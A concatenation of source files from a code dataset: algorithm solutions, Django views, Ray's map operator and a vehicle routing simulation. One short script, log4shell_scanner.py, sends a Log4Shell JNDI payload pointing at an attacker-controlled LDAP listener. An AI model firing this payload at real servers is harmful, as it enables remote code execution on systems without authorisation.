plt.show()\n","repo_name":"kun368/kaggle-code-v2","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36737699280","text":"import sys\nsys.setrecursionlimit(10000000)\ninput=lambda : sys.stdin.readline().rstrip()\n\nn,m=map(int,input().split())\nclass UnionFind:\n def __init__(self, n):\n self.data=[-1 for i in range(n)]\n\n def root(self,x):\n if self.data[x]<0:\n return x\n else:\n self.data[x]=self.root(self.data[x])\n return self.data[x]\n\n def uni(self,x,y):\n x=self.root(x)\n y=self.root(y)\n if(x==y):\n return\n if self.data[y] \n\nimport sys\nimport requests\n\nvuln_webserver = sys.argv[1]\nlistener_ip = sys.argv[2]\n\ns = requests.Session()\ns.headers = {'X-Api-Version': r'${jndi:ldap://%s:1389/Exploit}'%listener_ip}\ntry:\n print(f\"probing {vuln_webserver}...\")\n r = s.get(f\"{vuln_webserver}\", verify=False, timeout=1)\n print(r.text)\nexcept Exception as e:\n print (e.text)\n\ns.close()","repo_name":"gr4ysku11/log4shell_scanner","sub_path":"log4shell_scanner.py","file_name":"log4shell_scanner.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"71562929697","text":"str\nphantom = \"Phantom of the\"\nmovie = phantom + \" opera\"\nsingle_char = \"c\"\nsingle_quotes = 'hello world'\nempty_string = ''\n\n\n\n\nint\nnumber1 = 3\nnumber2 = 1002\nnumber2 = number2 + 1\nnumber3 = number1 + number2\nnum4 = number1 * 14 \nnum5 = 10 - 2\nnegative_number = -3\nzero = 0\n\n\nfloat\nf_number = 0.3\nf_number2 = -6.4\nanother_zero = 0.0\nlooks_like_int = 3.0\n\nbool\nboolean1 = True\nb2 = False\nb3 = (4 < 6)\nb43 = (3.2 >= 100.2)\n\n\nnothing = None\n\n# var output\nprint(-34)\nprint(0.56)\nprint(10+1)\nprint(True)\nprint(\"hello world\")\nprint(some_value)\nprint(\"my age is\", 
age)","repo_name":"dannteMich/python_course","sub_path":"lesson_01/02_types/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72960562338","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom maio.models import Media\n\n@login_required\ndef dashboard(request):\n cd = {}\n width = 260\n images = list(Media.get_all_images(request))\n for image in images:\n if image.tn_width > image.tn_height:\n x = width * image.tn_width / image.tn_height\n margin = int(width - x) // 2\n image.margin_left = margin\n image.margin_top = 0\n else:\n y = width * image.tn_height / image.tn_width\n margin = int(width - y) // 2\n image.margin_top = margin\n image.margin_left = 0\n cd['width'] = 260\n cd['images'] = images\n return render(request, 'maio/dashboard.html', cd)\n","repo_name":"jonmsawyer/maio","sub_path":"maio/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36396752452","text":"from abc import ABC, abstractmethod\nimport copy\nfrom dataclasses import dataclass\nimport itertools\nfrom typing import Callable, List, Iterator, Any, Dict, Optional, Union\n\nimport ray\nfrom ray.data.block import (\n Block,\n BlockAccessor,\n BlockMetadata,\n BlockExecStats,\n)\nfrom ray.data._internal.compute import (\n ComputeStrategy,\n TaskPoolStrategy,\n ActorPoolStrategy,\n)\nfrom ray.data._internal.execution.interfaces import (\n RefBundle,\n ExecutionOptions,\n ExecutionResources,\n PhysicalOperator,\n TaskContext,\n MapTransformFn,\n)\nfrom ray.data._internal.memory_tracing import trace_allocation\nfrom ray.data._internal.stats import StatsDict\nfrom ray.util.scheduling_strategies import NodeAffinitySchedulingStrategy\nfrom ray.types import ObjectRef\nfrom ray._raylet import ObjectRefGenerator\n\n\nclass MapOperator(PhysicalOperator, ABC):\n \"\"\"A streaming operator that maps input bundles 1:1 to output bundles.\n\n This operator implements the distributed map operation, supporting both task\n and actor compute strategies.\n \"\"\"\n\n def __init__(\n self,\n transform_fn: MapTransformFn,\n input_op: PhysicalOperator,\n name: str,\n min_rows_per_bundle: Optional[int],\n ray_remote_args: Optional[Dict[str, Any]],\n ):\n # NOTE: This constructor should not be called directly; use MapOperator.create()\n # instead.\n # NOTE: This constructor must be called by subclasses.\n\n self._transform_fn = transform_fn\n self._ray_remote_args = _canonicalize_ray_remote_args(ray_remote_args or {})\n self._ray_remote_args_factory = None\n\n # Bundles block references up to the min_rows_per_bundle target.\n self._block_ref_bundler = _BlockRefBundler(min_rows_per_bundle)\n # Object store allocation stats.\n self._metrics = _ObjectStoreMetrics(alloc=0, freed=0, cur=0, peak=0)\n\n # Queue for task outputs, either ordered or unordered (this is set by start()).\n self._output_queue: _OutputQueue = None\n # Output metadata, added to on get_next().\n self._output_metadata: List[BlockMetadata] = []\n\n super().__init__(name, [input_op])\n\n @classmethod\n def create(\n cls,\n transform_fn: MapTransformFn,\n input_op: PhysicalOperator,\n init_fn: Optional[Callable[[], None]] = None,\n name: str = \"Map\",\n # TODO(ekl): slim down ComputeStrategy to only specify the compute\n # config and not contain 
implementation code.\n compute_strategy: Optional[ComputeStrategy] = None,\n min_rows_per_bundle: Optional[int] = None,\n ray_remote_args: Optional[Dict[str, Any]] = None,\n ) -> \"MapOperator\":\n \"\"\"Create a MapOperator.\n\n This factory creates the MapOperator pool implementation that corresponds to the\n compute argument:\n - If None or TaskPoolStrategy -> TaskPoolMapOperator\n - If ActorPoolStrategy -> ActorPoolMapOperator\n\n Args:\n transform_fn: The function to apply to each ref bundle input.\n input_op: Operator generating input data for this op.\n init_fn: The callable class to instantiate if using ActorPoolMapOperator.\n name: The name of this operator.\n compute_strategy: Customize the compute strategy for this op.\n min_rows_per_bundle: The number of rows to gather per batch passed to the\n transform_fn, or None to use the block size. Setting the batch size is\n important for the performance of GPU-accelerated transform functions.\n The actual rows passed may be less if the dataset is small.\n ray_remote_args: Customize the ray remote args for this op's tasks.\n \"\"\"\n if compute_strategy is None:\n compute_strategy = TaskPoolStrategy()\n\n if isinstance(compute_strategy, TaskPoolStrategy):\n from ray.data._internal.execution.operators.task_pool_map_operator import (\n TaskPoolMapOperator,\n )\n\n return TaskPoolMapOperator(\n transform_fn,\n input_op,\n name=name,\n min_rows_per_bundle=min_rows_per_bundle,\n ray_remote_args=ray_remote_args,\n )\n elif isinstance(compute_strategy, ActorPoolStrategy):\n from ray.data._internal.execution.operators.actor_pool_map_operator import (\n ActorPoolMapOperator,\n AutoscalingConfig,\n AutoscalingPolicy,\n )\n\n autoscaling_config = AutoscalingConfig.from_compute_strategy(\n compute_strategy\n )\n autoscaling_policy = AutoscalingPolicy(autoscaling_config)\n\n if init_fn is None:\n\n def init_fn():\n pass\n\n return ActorPoolMapOperator(\n transform_fn,\n init_fn,\n input_op,\n autoscaling_policy=autoscaling_policy,\n name=name,\n min_rows_per_bundle=min_rows_per_bundle,\n ray_remote_args=ray_remote_args,\n )\n else:\n raise ValueError(f\"Unsupported execution strategy {compute_strategy}\")\n\n def start(self, options: \"ExecutionOptions\"):\n super().start(options)\n # Create output queue with desired ordering semantics.\n if options.preserve_order:\n self._output_queue = _OrderedOutputQueue()\n else:\n self._output_queue = _UnorderedOutputQueue()\n\n if options.locality_with_output:\n if isinstance(options.locality_with_output, list):\n locs = options.locality_with_output\n else:\n locs = [ray.get_runtime_context().get_node_id()]\n\n class RoundRobinAssign:\n def __init__(self, locs):\n self.locs = locs\n self.i = 0\n\n def __call__(self, args):\n args = copy.deepcopy(args)\n args[\"scheduling_strategy\"] = NodeAffinitySchedulingStrategy(\n self.locs[self.i],\n soft=True,\n _spill_on_unavailable=True,\n )\n self.i += 1\n self.i %= len(self.locs)\n return args\n\n self._ray_remote_args_factory = RoundRobinAssign(locs)\n\n # Put the function def in the object store to avoid repeated serialization\n # in case it's large (i.e., closure captures large objects).\n self._transform_fn_ref = ray.put(self._transform_fn)\n\n def add_input(self, refs: RefBundle, input_index: int):\n assert input_index == 0, input_index\n # Add ref bundle allocation to operator's object store metrics.\n self._metrics.cur += refs.size_bytes()\n if self._metrics.cur > self._metrics.peak:\n self._metrics.peak = self._metrics.cur\n # Add RefBundle to the bundler.\n 
self._block_ref_bundler.add_bundle(refs)\n if self._block_ref_bundler.has_bundle():\n # If the bundler has a full bundle, add it to the operator's task submission\n # queue.\n bundle = self._block_ref_bundler.get_next_bundle()\n self._add_bundled_input(bundle)\n\n def _get_runtime_ray_remote_args(self) -> Dict[str, Any]:\n if self._ray_remote_args_factory:\n return self._ray_remote_args_factory(self._ray_remote_args)\n return self._ray_remote_args\n\n @abstractmethod\n def _add_bundled_input(self, refs: RefBundle):\n \"\"\"Add a pre-bundled upstream output to this operator.\n\n Unlike the add_input() arg, this RefBundle has already been further bundled by\n _block_ref_bundler up to the target size, meaning that this bundle is ready for\n task submission.\n\n This must be implemented by subclasses.\n\n Args:\n refs: The fully-bundled ref bundle that should be added as input.\n \"\"\"\n raise NotImplementedError\n\n def _handle_task_submitted(self, task: \"_TaskState\"):\n \"\"\"Handle a newly submitted task, notifying the output queue and updating\n object store metrics.\n\n This should be called by subclasses right after a task is submitted.\n\n Args:\n task: The task state for the newly submitted task.\n \"\"\"\n # Notify output queue that this task is pending.\n self._output_queue.notify_pending_task(task)\n\n @abstractmethod\n def notify_work_completed(\n self, ref: Union[ObjectRef[ObjectRefGenerator], ray.ObjectRef]\n ):\n \"\"\"Indicates that a task is done executing OR that a worker is done starting.\n\n This must be implemented by subclasses.\n\n Args:\n ref: The output ref for the task that's done or the worker that has\n been started.\n \"\"\"\n raise NotImplementedError\n\n def _handle_task_done(self, task: \"_TaskState\"):\n \"\"\"Handle a newly completed task, notifying the output queue, freeing task\n inputs, and updating object store metrics.\n\n This should be called by subclasses right after a task completes.\n\n Args:\n task: The task state for the newly completed task.\n \"\"\"\n # Notify output queue that this task is complete.\n self._output_queue.notify_task_completed(task)\n task.inputs.destroy_if_owned()\n # Update object store metrics.\n allocated = task.output.size_bytes()\n self._metrics.alloc += allocated\n self._metrics.cur += allocated\n freed = task.inputs.size_bytes()\n self._metrics.freed += freed\n self._metrics.cur -= freed\n if self._metrics.cur > self._metrics.peak:\n self._metrics.peak = self._metrics.cur\n\n def inputs_done(self):\n self._block_ref_bundler.done_adding_bundles()\n if self._block_ref_bundler.has_bundle():\n # Handle any leftover bundles in the bundler.\n bundle = self._block_ref_bundler.get_next_bundle()\n self._add_bundled_input(bundle)\n super().inputs_done()\n\n def has_next(self) -> bool:\n assert self._started\n return self._output_queue.has_next()\n\n def get_next(self) -> RefBundle:\n assert self._started\n bundle = self._output_queue.get_next()\n self._metrics.cur -= bundle.size_bytes()\n for _, meta in bundle.blocks:\n self._output_metadata.append(meta)\n return bundle\n\n @abstractmethod\n def get_work_refs(\n self,\n ) -> List[Union[ObjectRef[ObjectRefGenerator], ray.ObjectRef]]:\n raise NotImplementedError\n\n @abstractmethod\n def num_active_work_refs(self) -> int:\n raise NotImplementedError\n\n @abstractmethod\n def progress_str(self) -> str:\n raise NotImplementedError\n\n def get_metrics(self) -> Dict[str, int]:\n return self._metrics.to_metrics_dict()\n\n def get_stats(self) -> StatsDict:\n return {self._name: 
self._output_metadata}\n\n def get_transformation_fn(self) -> MapTransformFn:\n return self._transform_fn\n\n @abstractmethod\n def shutdown(self):\n # NOTE: This must be implemented by subclasses, and those overriding methods\n # must call this method.\n super().shutdown()\n\n @abstractmethod\n def current_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @abstractmethod\n def base_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @abstractmethod\n def incremental_resource_usage(self) -> ExecutionResources:\n raise NotImplementedError\n\n @staticmethod\n def _map_ref_to_ref_bundle(ref: ObjectRef[ObjectRefGenerator]) -> RefBundle:\n \"\"\"Utility for converting a generator ref to a RefBundle.\n\n This function blocks on the completion of the underlying generator task via\n ray.get().\n \"\"\"\n all_refs = list(ray.get(ref))\n del ref\n block_refs = all_refs[:-1]\n block_metas = ray.get(all_refs[-1])\n assert len(block_metas) == len(block_refs), (block_refs, block_metas)\n for ref in block_refs:\n trace_allocation(ref, \"map_operator_work_completed\")\n return RefBundle(list(zip(block_refs, block_metas)), owns_blocks=True)\n\n\n@dataclass\nclass _TaskState:\n \"\"\"Tracks the driver-side state for an MapOperator task.\n\n Attributes:\n inputs: The input ref bundle.\n output: The output ref bundle that is set when the task completes.\n \"\"\"\n\n inputs: RefBundle\n output: Optional[RefBundle] = None\n\n\n@dataclass\nclass _ObjectStoreMetrics:\n \"\"\"Metrics for object store memory allocations.\"\"\"\n\n alloc: int\n freed: int\n cur: int\n peak: int\n\n def to_metrics_dict(self) -> Dict[str, int]:\n return {\n \"obj_store_mem_alloc\": self.alloc,\n \"obj_store_mem_freed\": self.freed,\n \"obj_store_mem_peak\": self.peak,\n }\n\n\ndef _map_task(\n fn: MapTransformFn,\n ctx: TaskContext,\n *blocks: Block,\n) -> Iterator[Union[Block, List[BlockMetadata]]]:\n \"\"\"Remote function for a single operator task.\n\n Args:\n fn: The callable that takes Iterator[Block] as input and returns\n Iterator[Block] as output.\n blocks: The concrete block values from the task ref bundle.\n\n Returns:\n A generator of blocks, followed by the list of BlockMetadata for the blocks\n as the last generator return.\n \"\"\"\n output_metadata = []\n stats = BlockExecStats.builder()\n for b_out in fn(iter(blocks), ctx):\n # TODO(Clark): Add input file propagation from input blocks.\n m_out = BlockAccessor.for_block(b_out).get_metadata([], None)\n m_out.exec_stats = stats.build()\n output_metadata.append(m_out)\n yield b_out\n stats = BlockExecStats.builder()\n yield output_metadata\n\n\nclass _BlockRefBundler:\n \"\"\"Rebundles RefBundles to get them close to a particular number of rows.\"\"\"\n\n def __init__(self, min_rows_per_bundle: Optional[int]):\n \"\"\"Creates a BlockRefBundler.\n\n Args:\n min_rows_per_bundle: The target number of rows per bundle. 
Note that we\n bundle up to this target, but only exceed it if not doing so would\n result in an empty bundle.\n \"\"\"\n self._min_rows_per_bundle = min_rows_per_bundle\n self._bundle_buffer: List[RefBundle] = []\n self._bundle_buffer_size = 0\n self._finalized = False\n\n def add_bundle(self, bundle: RefBundle):\n \"\"\"Add a bundle to the bundler.\"\"\"\n self._bundle_buffer.append(bundle)\n self._bundle_buffer_size += self._get_bundle_size(bundle)\n\n def has_bundle(self) -> bool:\n \"\"\"Returns whether the bundler has a bundle.\"\"\"\n return self._bundle_buffer and (\n self._min_rows_per_bundle is None\n or self._bundle_buffer_size >= self._min_rows_per_bundle\n or (self._finalized and self._bundle_buffer_size > 0)\n )\n\n def get_next_bundle(self) -> RefBundle:\n \"\"\"Gets the next bundle.\"\"\"\n assert self.has_bundle()\n if self._min_rows_per_bundle is None:\n # Short-circuit if no bundle row target was defined.\n assert len(self._bundle_buffer) == 1\n bundle = self._bundle_buffer[0]\n self._bundle_buffer = []\n self._bundle_buffer_size = 0\n return bundle\n leftover = []\n output_buffer = []\n output_buffer_size = 0\n buffer_filled = False\n for bundle in self._bundle_buffer:\n bundle_size = self._get_bundle_size(bundle)\n if buffer_filled:\n # Buffer has been filled, save it in the leftovers.\n leftover.append(bundle)\n elif (\n output_buffer_size + bundle_size <= self._min_rows_per_bundle\n or output_buffer_size == 0\n ):\n # Bundle fits in buffer, or bundle doesn't fit but the buffer still\n # needs a non-empty bundle.\n output_buffer.append(bundle)\n output_buffer_size += bundle_size\n else:\n # Bundle doesn't fit in a buffer that already has at least one non-empty\n # bundle, so we add it to the leftovers.\n leftover.append(bundle)\n # Add all remaining bundles to the leftovers.\n buffer_filled = True\n self._bundle_buffer = leftover\n self._bundle_buffer_size = sum(\n self._get_bundle_size(bundle) for bundle in leftover\n )\n return _merge_ref_bundles(*output_buffer)\n\n def done_adding_bundles(self):\n \"\"\"Indicate that no more RefBundles will be added to this bundler.\"\"\"\n self._finalized = True\n\n @staticmethod\n def _get_bundle_size(bundle: RefBundle):\n return bundle.num_rows() if bundle.num_rows() is not None else float(\"inf\")\n\n\ndef _merge_ref_bundles(*bundles: RefBundle) -> RefBundle:\n \"\"\"Merge N ref bundles into a single bundle of multiple blocks.\"\"\"\n # Check that at least one bundle is non-null.\n assert any(bundle is not None for bundle in bundles)\n blocks = list(\n itertools.chain(\n block for bundle in bundles if bundle is not None for block in bundle.blocks\n )\n )\n owns_blocks = all(bundle.owns_blocks for bundle in bundles if bundle is not None)\n return RefBundle(blocks, owns_blocks)\n\n\nclass _OutputQueue:\n \"\"\"Interface for swapping between different output order modes.\"\"\"\n\n def notify_pending_task(self, task: _TaskState):\n \"\"\"Called when a new task becomes pending.\"\"\"\n pass\n\n def notify_task_completed(self, task: _TaskState):\n \"\"\"Called when a previously pending task completes.\"\"\"\n pass\n\n def has_next(self) -> bool:\n raise NotImplementedError\n\n def get_next(self) -> RefBundle:\n raise NotImplementedError\n\n\nclass _OrderedOutputQueue(_OutputQueue):\n \"\"\"An queue that returns finished tasks in submission order.\"\"\"\n\n def __init__(self):\n self._tasks_by_output_order: Dict[int, _TaskState] = {}\n self._next_task_index: int = 0\n self._next_output_index: int = 0\n\n def notify_pending_task(self, 
task: _TaskState):\n self._tasks_by_output_order[self._next_task_index] = task\n self._next_task_index += 1\n\n def has_next(self) -> bool:\n i = self._next_output_index\n return (\n i in self._tasks_by_output_order\n and self._tasks_by_output_order[i].output is not None\n )\n\n def get_next(self) -> RefBundle:\n # Get the output RefBundle for the current task.\n out_bundle = self._tasks_by_output_order[self._next_output_index].output\n # Pop out the next single-block bundle.\n next_bundle = RefBundle(\n [out_bundle.blocks.pop(0)], owns_blocks=out_bundle.owns_blocks\n )\n if not out_bundle.blocks:\n # If this task's RefBundle is exhausted, move to the next one.\n del self._tasks_by_output_order[self._next_output_index]\n self._next_output_index += 1\n return next_bundle\n\n\nclass _UnorderedOutputQueue(_OutputQueue):\n \"\"\"A queue that does not guarantee output order of finished tasks.\"\"\"\n\n def __init__(self):\n self._completed_tasks: List[_TaskState] = []\n\n def notify_task_completed(self, task: _TaskState):\n self._completed_tasks.append(task)\n\n def has_next(self) -> bool:\n return len(self._completed_tasks) > 0\n\n def get_next(self) -> RefBundle:\n # Get the output RefBundle for the oldest completed task.\n out_bundle = self._completed_tasks[0].output\n # Pop out the next single-block bundle.\n next_bundle = RefBundle(\n [out_bundle.blocks.pop(0)], owns_blocks=out_bundle.owns_blocks\n )\n if not out_bundle.blocks:\n # If this task's RefBundle is exhausted, move to the next one.\n del self._completed_tasks[0]\n return next_bundle\n\n\ndef _canonicalize_ray_remote_args(ray_remote_args: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Enforce rules on ray remote args for map tasks.\n\n Namely, args must explicitly specify either CPU or GPU, not both. 
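For example, an empty dict is canonicalized to {\"num_cpus\": 1}, {\"num_cpus\": 2} passes through unchanged, and {\"num_cpus\": 1, \"num_gpus\": 1} raises a ValueError. 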
Disallowing\n mixed resources avoids potential starvation and deadlock issues during scheduling,\n and should not be a serious limitation for users.\n \"\"\"\n ray_remote_args = ray_remote_args.copy()\n if \"num_cpus\" not in ray_remote_args and \"num_gpus\" not in ray_remote_args:\n ray_remote_args[\"num_cpus\"] = 1\n if ray_remote_args.get(\"num_gpus\", 0) > 0:\n if ray_remote_args.get(\"num_cpus\", 0) != 0:\n raise ValueError(\n \"It is not allowed to specify both num_cpus and num_gpus for map tasks.\"\n )\n elif ray_remote_args.get(\"num_cpus\", 0) > 0:\n if ray_remote_args.get(\"num_gpus\", 0) != 0:\n raise ValueError(\n \"It is not allowed to specify both num_cpus and num_gpus for map tasks.\"\n )\n return ray_remote_args\n","repo_name":"usborn116/espn-nba-trade-helper","sub_path":"venv/lib/python3.8/site-packages/ray/data/_internal/execution/operators/map_operator.py","file_name":"map_operator.py","file_ext":"py","file_size_in_byte":21223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36920430892","text":"from django.shortcuts import render, HttpResponse\nfrom django.http import JsonResponse\nimport random\nimport string\nfrom register.models import Resume\nfrom register.forms import resumeForm\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef isValid():\n\treturn True\ndef createUser(req):\n\tif req.method == 'POST':\n\t\tform=resumeForm(req.POST)\n\t\tprint(\"Here\")\n\t\tus = req.POST.get(\"username\",\"\")\n\t\tna = req.POST.get(\"name\",\"\")\n\t\tag = req.POST.get(\"age\",\"\")\n\t\tco = req.POST.get(\"contactNum\",\"\")\n\t\tem = req.POST.get(\"email\",\"\")\n\t\tar = req.POST.get(\"areaOfExpertise\",\"\")\n\t\tad = req.POST.get(\"address\",\"\")\n\t\tci = req.POST.get(\"city\",\"\")\n\t\tst = req.POST.get(\"state\",\"\")\n\t\tpr = req.POST.get(\"prefferedLocation\",\"\")\n\t\tqu = req.POST.get(\"qualification\",\"\")\n\t\tte = req.POST.get(\"teachingExperience\",\"\")\n\t\tcu = req.POST.get(\"currentSchool\",\"\")\n\t\tif isValid():\n\t\t\n\t\t\ttry:\n\t\t\t\tq=Resume(username=us,name=na,age=ag,contactNum=co,email = em,areaOfExpertise = ar,address = ad,city = ci,state = st,prefferedLocation = pr,qualification = qu,teachingExperience = te,currentSchool =cu)\n\t\t\t\tq.save()\n\t\t\t\treturn render(req, 'signUp.htm', {'user_obj': q,'is_registered':True })\n\t\t\texcept Exception:\n\t\t\t\treturn HttpResponse(\"error\")\n\telse:\n\t\tform = resumeForm() # an unboundform\n\t\treturn render(req,'signUp.htm', {'form': form})","repo_name":"chanchurbansal/DjangoLoginAuthAPI","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24243044627","text":"import json\n\nif __name__ == \"__main__\":\n json_data = json.load(open('submit-6-16.segm.json', 'r'))\n for i, data in enumerate(json_data):\n if data['category_id'] == 3:\n json_data[i]['category_id'] = 5\n elif data['category_id'] == 5:\n json_data[i]['category_id'] = 3\n json.dump(json_data, open('revised-submit-6-16.segm.json', 'w'))","repo_name":"zwl-max/mouth_Instance_Segement","sub_path":"code/tools/revise_json.py","file_name":"revise_json.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"33730680091","text":"import time\nimport socket\nimport threading\nimport json\nimport 
random\n\n\nclass BattleGround:\n def __init__(self, _x, _y):\n self.x = _x\n self.y = _y\n\nTTL = 1000\np = 1.1\nt = 0\n\nclass TableEntry:\n def __init__(self, _key, _nxt_hop, _time_to_live, _seq_num ):\n self.key = _key\n self.nxt_hop = _nxt_hop\n self.time_to_live = _time_to_live\n self.seq_num = _seq_num\n\n def print_entry(self):\n print(\"key: \" + str(self.key) + \" next hop: \" + str(self.nxt_hop))\n\nclass Message:\n def __init__(self, nid, type, value):\n self.nid = nid\n self.type = type # hello , hello_ack , Message\n self.value = value\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nclass Vehicle:\n def __init__(self, _id, _x, _y, _ip, _port, _delay, _server_ip, _server_port, _battle_ground, _n):\n self.id = _id\n self.x = _x\n self.y = _y\n self.ip = _ip\n self.port = _port\n self.server_ip = _server_ip\n self.server_port = _server_port\n self.server_conn = []\n self.battle_ground = _battle_ground\n self.delay = _delay\n self.n = _n\n self.route_table = []\n self.init_finish = False\n self.nbrs = []\n self.rrq_received = []\n self.rrq_counter = 1\n\n self.recently_sent = [0]\n\n main_thread = threading.Thread(target=self.main, args=())\n main_thread.daemon = True\n main_thread.start()\n\n def main(self):\n\n server_thread = threading.Thread(target=self.listen_to_server, args=())\n server_thread.daemon = True\n server_thread.start()\n\n time.sleep(0.25 * self.n)\n\n connect_thread = threading.Thread(target=self.connect_to_server, args=())\n connect_thread.daemon = True\n connect_thread.start()\n\n def delayed_send(self, msg):\n self.recently_sent[0] = msg\n\n byte_array = json.dumps(msg.__dict__).encode(\"utf-8\")\n time.sleep(self.delay)\n self.server_conn[0].send(byte_array)\n\n def connect_to_server(self):\n\n client_socket = socket.socket()\n client_socket.connect((self.server_ip, self.server_port))\n self.server_conn.append(client_socket)\n\n hello_thread = threading.Thread(target=self.hello, args=())\n hello_thread.daemon = True\n hello_thread.start()\n\n def listen_to_server(self):\n server_socket = socket.socket()\n server_socket.bind((self.ip, self.port))\n server_socket.listen(2)\n conn, address = server_socket.accept()\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n msg_rec = Message(**json.loads(data, encoding=\"utf-8\"))\n\n if msg_rec.type == \"hello\":\n m = Message(str(self.id), \"hello_ack\", msg_rec.nid)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"hello_ack\":\n self.route_table.append(TableEntry(int(msg_rec.nid), int(msg_rec.nid), TTL, 0 ))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n elif msg_rec.type == \"init_finish\":\n self.init_finish = True\n\n elif msg_rec.type == \"RRQ\":\n # destination ----------- counter\n tmp2 = msg_rec.value.split(\"+\")\n # current hop --------- source\n tmp3 = msg_rec.nid.split(\"+\")\n\n # check for duplicate rrq\n found = False\n for item4 in self.rrq_received:\n if item4[0] == tmp3[1] and item4[1] == tmp2[0] and item4[2] == tmp2[1]:\n found = True\n break\n if found:\n continue\n else:\n # source -------------- destination ----------- counter\n self.rrq_received.append([tmp3[1], tmp2[0], tmp2[1]])\n\n # update routing\n founded = False\n for item7 in self.route_table:\n if str(item7.key) == str(tmp3[1]):\n founded = True\n break\n if founded:\n pass\n else:\n 
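# learn the reverse route: the RRQ source (tmp3[1]) is reachable through\n # the neighbour that relayed this request (tmp3[0])\n 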
self.route_table.append(TableEntry(int(tmp3[1]), int(tmp3[0]), TTL, int(tmp2[1])))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n # check if dst\n rrp = 0\n if int(tmp2[0]) == self.id:\n rrp = self.id\n # in routing table\n for item5 in self.route_table:\n if item5.key == int(tmp2[0]):\n rrp = item5.nxt_hop\n if rrp:\n # relay back rrp\n # current --------------- next hop ---------------- source -------------- destination\n m = Message(str(self.id) + \"+\" + str(tmp3[0]), \"RRP\", str(tmp3[1]) + \"+\" + str(tmp2[0]))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n # rebroadcast RRQ\n m = Message(str(self.id) + \"+\" + str(tmp3[1]), \"RRQ\", msg_rec.value)\n self.rrq_counter = self.rrq_counter + 1\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"RRP\":\n tmp2 = msg_rec.value.split(\"+\")\n\n # add to routing table\n\n already_existed = False\n for item5 in self.route_table:\n if item5.key == int(tmp2[1]):\n already_existed = True\n if already_existed:\n pass\n else:\n self.route_table.append(TableEntry(int(tmp2[1]), int(msg_rec.nid), TTL, 0))\n print(\"update \" + str(self.id) + \" Routing table of node \" + str(self.id))\n\n # if source, send message, else relay back\n if int(tmp2[0]) == self.id:\n pass\n else:\n # search in routing table\n tmp4 = 0\n for item5 in self.route_table:\n if item5.key == int(tmp2[0]):\n tmp4 = item5.nxt_hop\n\n # relay back rrp\n m = Message(str(self.id) + \"+\" + str(tmp4), \"RRP\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"Message\":\n # check if that is its own\n tmp2 = msg_rec.nid.split(\"+\")\n # --------- source ------- prev hop ----- destination ------\n # update routing table for prev and source node\n\n # check\n if int(tmp2[2]) == self.id: # msg reached dst\n print(\"receive \" + tmp2[2] + \" \" + msg_rec.value)\n\n global t\n elapsed = time.time() - t\n print(elapsed)\n\n else:\n # search in routing table\n founded = False\n\n tmp3 = 0\n for item2 in self.route_table:\n if str(item2.key) == tmp2[2]:\n founded = True\n tmp3 = item2.nxt_hop\n break\n\n if founded:\n # relay to next hop\n # --------- source -------------- next hop ------------ destination ------ current hop\n m = Message(str(tmp2[0]) + \"+\" + str(tmp3 ) + \"+\" + tmp2[2] + \"+\" + str(self.id), \"Message\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n pass\n\n elif msg_rec.type == \"drop\":\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([self.recently_sent[0]]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Resend\")\n\n def hello(self):\n\n m = Message(str(self.id), \"hello\", str(self.x) + \" \" + str(self.y))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n global t\n if self.id == 1:\n t = time.time()\n\n def send_msg(self, msg, dst):\n\n # Search in routing table\n founded = False\n dst = dst + 1\n tmp4 = 0\n for item5 in self.route_table:\n if str(item5.key) == str(dst):\n founded = True\n tmp4 
